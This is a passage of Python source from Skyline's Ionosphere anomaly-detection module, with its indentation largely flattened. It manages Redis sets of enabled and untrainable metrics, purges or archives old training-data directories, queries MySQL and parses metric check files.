class Ionosphere(Thread):
"""
The Ionosphere class which controls the ionosphere thread and spawned
processes.
"""
def __init__(self, parent_pid):
"""
Initialize Ionosphere
Define Redis, mysql and memcached connections
"""
super(Ionosphere, self).__init__()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn and get_redis_conn_decoded
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.mysql_conn = mysql.connector.connect(**config)
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager().list() below and replaced with Redis sets
# self.anomalous_metrics = Manager().list()
# self.not_anomalous = Manager().list()
# self.features_profiles_checked = Manager().list()
# self.training_metrics = Manager().list()
# self.sent_to_panorama = Manager().list()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
# self.ionosphere_smtp_alerter_metrics = Manager().list()
# self.ionosphere_non_smtp_alerter_metrics = Manager().list()
# @added 20170306 - Feature #1960: ionosphere_layers
# self.layers_checked = Manager().list()
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
self.memcache_client = pymemcache_Client((settings.MEMCACHED_SERVER_IP, settings.MEMCACHED_SERVER_PORT), connect_timeout=0.1, timeout=0.2)
else:
self.memcache_client = None
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warn('warning :: parent or current process dead')
exit(0)
"""
These are the ionosphere mysql functions used to surface and input
ionosphere data for timeseries.
"""
def mysql_insert(self, insert):
"""
Insert data into mysql table
:param insert: the insert string
:type insert: str
:return: int
:rtype: int or boolean
- **Example usage**::
query = 'insert into host (host) VALUES (\'this_host\')'
result = self.mysql_insert(query)
.. note::
- If the MySQL query fails a boolean will be returned not a tuple
* ``False``
* ``None``
"""
try:
cnx = mysql.connector.connect(**config)
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to mysql')
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('error :: failed to connect to mysql')
raise
if cnx:
try:
cursor = cnx.cursor()
cursor.execute(insert)
inserted_id = cursor.lastrowid
# Make sure data is committed to the database
cnx.commit()
cursor.close()
cnx.close()
return inserted_id
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('Failed to insert record')
cnx.close()
raise
else:
cnx.close()
return False
return False
def purge_old_data_dirs(self, dir_path, older_than):
time_now = time()
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
        # Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('Cleaning old training data from %s older than %s seconds' % (
dir_path, str(older_than)))
else:
logger.info('IONOSPHERE_MANAGE_PURGE set to False managing ionosphere.training_data only, not purging')
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# If training_data is not purged and contains the correct training_data
# files, add it to the list to be added to the Redis set
training_data_list = []
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
        # Added occasional logging for monitoring
last_log_time = int(time_now)
try:
for path, folders, files in os.walk(dir_path):
for folder in folders[:]:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
                    # Added occasional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
                        # Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('still purging')
else:
logger.info('still managing ionosphere.training_data')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report app up to stop other apps not finding the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
folder_path = os.path.join(path, folder)
# Only timestamped directories are removed
if re.match('\d{10}', folder):
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: matched - %s' % folder_path)
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
if (time_now - os.path.getmtime(folder_path)) > older_than:
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
if IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
for rpath, rfolders, rfiles in os.walk(folder_path):
for rfolder in rfolders[:]:
current_folder = os.path.join(rpath, rfolder)
for rrpath, rrfolders, rrfiles in os.walk(current_folder):
move_files = False
training_files_dirs = []
if len(rrfiles) > 0:
for rfile in rrfiles:
for include_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if include_namespace in rfile:
move_files = True
if move_files:
training_files_dirs.append(rrpath)
if training_files_dirs:
try:
dest_path = rrpath.replace(dir_path, IONOSPHERE_HISTORICAL_DATA_FOLDER)
if not os.path.exists(dest_path):
mkdir_p(dest_path)
training_files = []
for training_files_dir in training_files_dirs:
training_files = os.listdir(training_files_dir)
for f in training_files:
src_file = '%s/%s' % (training_files_dir, f)
dest_file = '%s/%s' % (dest_path, f)
shutil_move(src_file, dest_file)
files_moved = True
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to move files from %s to %s' % (current_folder, IONOSPHERE_HISTORICAL_DATA_FOLDER))
files_moved = False
if files_moved:
try:
rmtree(rrpath)
logger.info('removed - %s as files were moved to %s' % (rrpath, dest_path))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to rmtree %s' % rrpath)
try:
rmtree(folder_path)
logger.info('removed - %s' % folder_path)
except:
logger.error('error :: failed to rmtree %s' % folder_path)
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
except:
logger.info(traceback.format_exc())
logger.error('error :: purge_old_data_dirs - os.walk')
# @added 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('cleaned old training data')
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declare training_data_instances even if no training_data_list exists
# as it can be appended to by the historical training data
training_data_instances = []
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
if training_data_list:
training_data_instances = []
for training_data_dir in training_data_list:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
            # Added occasional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report app up to stop other apps not finding the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(training_data_dir):
# @modified 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Wrapped in try and except
try:
add_folder = False
metric = None
timestamp = None
if files:
add_folder = False
metric = None
timestamp = None
# @added 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declared these first for all
metric_file = None
metric_file_path = None
if '/learn/' in path:
# @modified 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# metric_file = None
# metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
# @added 20210329 - Feature #3978: luminosity - classify_metrics
# Feature #3642: Anomaly type classification
if ifile.startswith('adtk_'):
continue
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
elif ifile.endswith('.fp.created.txt'):
continue
# @added 20210329 - Feature #3978: luminosity - classify_metrics
# Feature #3642: Anomaly type classification
elif ifile.startswith('adtk_'):
continue
elif ifile == 'data.txt':
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match('\d{10}', element):
timestamp = int(element)
if metric and timestamp:
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine and add resolution
resolution_seconds = settings.FULL_DURATION
for ifile in files:
# @added 20210329 - Feature #3978: luminosity - classify_metrics
# Feature #3642: Anomaly type classification
if ifile.startswith('adtk_'):
continue
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# training_data_instances.append([metric, timestamp])
training_data_instances.append([metric, timestamp, resolution_seconds])
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate training_dir - %s' % str(training_data_dir))
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
        # If the IONOSPHERE_HISTORICAL_DATA_FOLDER dir exists, iterate it and
        # add its historical training data to the list.
if os.path.exists(IONOSPHERE_HISTORICAL_DATA_FOLDER) and IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
historical_training_data_added = 0
if training_data_instances:
training_data_count = len(training_data_instances)
logger.info('There are %s training_data instances before iterating histroical training data' % (str(training_data_count)))
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(IONOSPHERE_HISTORICAL_DATA_FOLDER):
try:
add_folder = False
metric = None
timestamp = None
historical_metric_data = False
if files:
for historical_metric_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if historical_metric_data:
continue
for ifile in files:
if historical_metric_namespace in ifile:
historical_metric_data = True
break
if historical_metric_data:
add_folder = False
metric = None
timestamp = None
if '/learn/' in path:
metric_file = None
metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
if ifile.endswith('.fp.created.txt'):
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match('\d{10}', element):
timestamp = int(element)
if metric and timestamp:
resolution_seconds = settings.FULL_DURATION
for ifile in files:
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
training_data_instances.append([metric, timestamp, resolution_seconds])
historical_training_data_added += 1
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate training_dir - %s' % str(training_data_dir))
logger.info('added %s historical training data instances' % (str(historical_training_data_added)))
if training_data_instances:
training_data_count = len(training_data_instances)
redis_set = 'ionosphere.training_data.new'
logger.info('creating Redis set %s with %s training_data instances' % (redis_set, str(training_data_count)))
try:
# Delete it if it exists and was not renamed for some reason
self.redis_conn.delete(redis_set)
logger.info(
'deleted Redis set - %s' % (redis_set))
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# for metric, timestamp in training_data_instances:
for metric, timestamp, resolution_seconds in training_data_instances:
try:
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# data = [metric, int(timestamp)]
data = [metric, int(timestamp), resolution_seconds]
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (str(data), redis_set))
try:
# Rename works to overwrite existing key fine
# and ... https://redis.io/commands/rename
# > when this happens RENAME executes an implicit DEL operation, so if the
# > deleted key contains a very big value it may cause high latency even if RENAME
# > itself is usually a constant-time operation.
                # Does not apply here, as this is not a massive set
self.redis_conn.rename('ionosphere.training_data.new', 'ionosphere.training_data')
logger.info('replaced Redis ionosphere.training_data via a rename of ionosphere.training_data.new')
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to rename ionosphere.training_data.new to ionosphere.training_data')
last_purge_ts = int(time())
try:
self.redis_conn.setex(last_purge_key, 1800, last_purge_ts)
logger.info('updated Redis key for %s' % last_purge_key)
except:
logger.error('error :: failed to update Redis key for %s' % last_purge_key)
backup_purge_ts_file = '%s/last_purge_ts.txt' % (settings.IONOSPHERE_DATA_FOLDER)
try:
write_data_to_file(skyline_app, backup_purge_ts_file, 'w', last_purge_ts)
logger.info('updated the backup_purge_ts_file with %s' % str(last_purge_ts))
except:
logger.error('error :: failed to update the backup_purge_ts_file - %s' % backup_purge_ts_file)
return
def remove_metric_check_file(self, metric_check_file):
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
def manage_ionosphere_unique_metrics(self):
"""
- Create a Redis set of all Ionosphere enabled metrics.
- Manage the ionosphere.untrainable_metrics set, removing items when
they 'expire'
:return: returns True
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
trace = traceback.format_exc()
logger.error('%s' % trace)
log_msg = 'error :: failed to get MySQL engine for manage_ionosphere_unique_metrics'
logger.error('%s' % log_msg)
return None, log_msg, trace
ionosphere_unique_metrics_count = 0
redis_ionosphere_unique_metrics = None
ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
manage_ionosphere_unique_metrics = True
manage_ionosphere_unique_metrics_key = []
try:
manage_ionosphere_unique_metrics_key = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
if LOCAL_DEBUG:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics key: %s' % str(e))
if manage_ionosphere_unique_metrics_key is not None:
manage_ionosphere_unique_metrics = False
logger.info('getting MySQL engine for ionosphere_enabled_metrics')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for ionosphere_enabled_metrics')
return False
if not engine:
logger.error('error :: MySQL engine not obtained for ionosphere_enabled_metrics')
return False
# Determine the metrics that have ionosphere_enabled
# @added 20170103 - Task #1658: Patterning Skyline Ionosphere
# TODO: We need 2 sets not just ionosphere.unique_metrics otherwise
# if a metric is switch from Analyzer to Mirage will send all
# matched anomalies to Ionosphere even if there is no features
# profile at the specified duration.
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
# @modified 20170108 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Yes those ^^ are needed, MySQL join?
ionosphere_enabled_metrics = []
ionosphere_metrics_count = 0
query_ok = False
try:
stmt = 'select metric from metrics where ionosphere_enabled=1'
connection = engine.connect()
for row in engine.execute(stmt):
metric_basename = row['metric']
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric_basename))
ionosphere_enabled_metrics.append(metric_name)
connection.close()
query_ok = True
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled metrics from the DB to manage ionosphere.unique_metrics Redis set')
ionosphere_metrics_count = len(ionosphere_enabled_metrics)
logger.info('db has %s ionosphere_enabled metrics' % (str(ionosphere_metrics_count)))
# @added 20190528 - Branch #3002: docker
if ionosphere_metrics_count == 0:
ionosphere_enabled_metrics = ['none']
if manage_ionosphere_unique_metrics:
# Testing the query was fine and Ionosphere metrics can go to 0 if
# all were disabled
if query_ok:
manage_ionosphere_unique_metrics = True
else:
manage_ionosphere_unique_metrics = False
if manage_ionosphere_unique_metrics:
for metric_name in ionosphere_enabled_metrics:
try:
self.redis_conn.sadd('ionosphere.new_unique_metrics', metric_name)
# logger.info('added %s to ionosphere.new_unique_metrics Redis set' % metric_name)
except:
logger.error(traceback.format_exc())
logger.info('error :: failed to add %s to ionosphere.new_unique_metrics Redis set' % metric_name)
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
try:
logger.info('replacing Redis ionosphere.unique_metrics via rename of ionosphere.new_unique_metrics')
self.redis_conn.rename('ionosphere.new_unique_metrics', 'ionosphere.unique_metrics')
manage_ionosphere_unique_metrics = False
ionosphere_unique_metrics = []
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
else:
logger.error('error :: could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
redis_ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('the new Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Manage ionosphere_untrainable_metrics Redis set
ionosphere_untrainable_metrics = []
ionosphere_untrainable_metrics_redis_set = 'ionosphere.untrainable_metrics'
try:
ionosphere_untrainable_metrics = list(self.redis_conn_decoded.smembers(ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the ionosphere.untrainable_metrics set from Redis')
if ionosphere_untrainable_metrics:
ionosphere_untrainable_metrics_check_time = int(time())
for ionosphere_untrainable_metric_str in ionosphere_untrainable_metrics:
try:
ionosphere_untrainable_metric = literal_eval(ionosphere_untrainable_metric_str)
ium_remove_after_timestamp = int(ionosphere_untrainable_metric[6])
if ionosphere_untrainable_metrics_check_time >= ium_remove_after_timestamp:
try:
self.redis_conn.srem(ionosphere_untrainable_metrics_redis_set, str(ionosphere_untrainable_metric))
logger.info('removed item - %s - from Redis set - %s' % (str(ionosphere_untrainable_metric), ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove item list from Redis set - %s' % ionosphere_untrainable_metrics_redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to manage Redis set %s' % ionosphere_untrainable_metrics_redis_set)
return True
# @added 20161230 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def new_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source']
float_keys = ['value']
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
int_keys = [
'from_timestamp', 'metric_timestamp', 'added_at', 'full_duration',
'ionosphere_parent_id']
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
array_keys = ['triggered_algorithms', 'algorithms', 'algorithms_run']
boolean_keys = ['graphite_metric', 'run_crucible_tests']
metric_vars_array = []
for var_array in metric_vars:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = int(value_str)
if var_array[0] in array_keys:
key = var_array[0]
value = literal_eval(str(var_array[1]))
if var_array[0] in boolean_keys:
key = var_array[0]
if str(var_array[1]) == 'True':
value = True
else:
value = False
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
            logger.error(
                'error :: loading metric variables - none found in %s' % (
                    str(metric_vars_file)))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
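        # Illustrative sketch (added comment; the metric name and values are
        # hypothetical) of the 'key = value' lines this parser expects in a
        # metric check file:
        #   metric = 'stats.example.requests'
        #   value = 1.0
        #   from_timestamp = 1592342340
        #   metric_timestamp = 1592342400
        #   added_by = 'mirage'
        # which would yield metric_vars_array entries such as
        # ['metric', 'stats.example.requests'] and ['value', 1.0].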
# @added 20170109 - Feature #1854: Ionosphere learn
    # Added the spawn_learn_process after determining it is not fit to bolt learn
    # inside of ionosphere.py in its entirety, no point in more conditional nesting
    # and bulking up ionosphere.py with more learn parameters to spin_process etc
# ionosphere.py works, as good as it gets, so extended with learn.py. This uses
# the same no memory leak pattern that was adopted for smtp_alerts.
def spawn_learn_process(self, i, timestamp):
"""
Spawn a process to learn.
        This is used for Ionosphere to learn whether anomalous metrics remain
        anomalous over time as the resolution decreases. It follows the
        multiprocessing methodology that was introduced in Analyzer and Mirage:
        the process objects are cleared down and the learn processes cannot
        create memory leaks, because each process always terminates (or is
        terminated), which prevents any memory leaks in the parent.
"""
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# learn(timestamp)
ionosphere_learn(timestamp)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
def process_ionosphere_echo(self, i, metric_check_file):
"""
Spawn a process_ionosphere_echo check to create features profiles at
settings.FULL_DURATION for Mirage metrics
:param i: python process id
:param metric_check_file: full path to the metric check file
:type i: object
:type metric_check_file: str
:return: boolean
:rtype: boolean
"""
try:
# Load and validate metric variables
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: process_ionosphere_echo :: failed to load metric variables from check file - %s' % (metric_check_file))
return
added_by = None
try:
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: process_ionosphere_echo failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
return
if added_by != 'mirage':
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow to be added by webapp
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: metric added_by %s OK' % added_by)
else:
logger.info('process_ionosphere_echo :: only mirage metrics are processed not metrics added_by %s' % added_by)
return
metric = None
try:
# metric_vars.metric
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: process_ionosphere_echo failed to load metric variable from check file - %s' % (metric_check_file))
return
# @added 20190413 - Feature #2484: FULL_DURATION feature profiles
# Only process if it is an ionosphere enabled metric
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
ionosphere_unique_metrics = []
if ionosphere_unique_metrics:
# @modified 20190413 - Bug #2942: process_ionosphere_echo metric mismatch
# Feature #2484: FULL_DURATION feature profiles
# Matching bug for not in list comprehension it must be an absolute
# match
# if not metric in ionosphere_unique_metrics:
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric))
# @modified 20190522: Task #3034: Reduce multiprocessing Manager list usage
# if not metric_name in ionosphere_unique_metrics:
if metric_name not in ionosphere_unique_metrics:
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow metrics added by webapp to skip this check as they may
# be new ionosphere metrics and not be in the ionosphere.unique_metrics
# set yet
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: %s is not in ionosphere.unique_metrics but added by webapp so possibly a new metric' % metric)
else:
logger.info('process_ionosphere_echo :: only ionosphere enabled metrics are processed, skipping %s' % metric)
return
full_duration = None
try:
# metric_vars.full_duration
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: process_ionosphere_echo failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
return
logger.info('process_ionosphere_echo :: processing - %s' % (metric))
ionosphere_echo(metric, full_duration)
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added the ionosphere_busy parameter
# def spin_process(self, i, metric_check_file):
def spin_process(self, i, metric_check_file, ionosphere_busy):
"""
Assign an anomalous metric to check against features profiles.
:param i: python process id
:param metric_check_file: full path to the metric check file
        :param ionosphere_busy: whether Ionosphere is busy, used to manage and
            alternate between normal Ionosphere analysis and echo analysis
        :type i: object
        :type metric_check_file: str
        :type ionosphere_busy: boolean
:return: int
:rtype: int or boolean
"""
dev_null = None
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
logger.error(traceback.format_exc())
log_msg = 'error :: failed to get MySQL engine in spin_process'
logger.error('error :: failed to get MySQL engine in spin_process')
return None, log_msg, trace
def engine_disposal(engine):
